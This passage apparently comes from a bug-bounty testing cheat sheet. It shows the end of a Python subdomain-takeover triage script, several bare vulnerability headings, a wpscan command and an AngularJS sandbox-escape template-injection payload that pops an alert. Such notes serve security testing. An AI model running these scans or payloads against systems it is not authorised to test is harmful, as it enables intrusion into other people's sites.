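    ("mail.example.com", None, True, 200, ""),
]

if __name__ == "__main__":
    for sub, verdict in triage(SAMPLE).items():
        print(f"{sub:22} {verdict}")
```

Filtering on 404 alone (step 2) is a shortcut that misses providers whose unclaimed page returns another status; the CNAME target and the page text are what decide it.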

Cross-Origin Resource Sharing

Dependency Confusion / Abuse

Content Injection

wpscan --url <URL> --api-token <API_TOKEN>
python2 BBH.py

Client-Side Template Injection

# AngularJS sandbox-escape payload (version-specific); it only fires where the input lands inside a template the framework evaluates
{{(_sub=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}

IDOR

References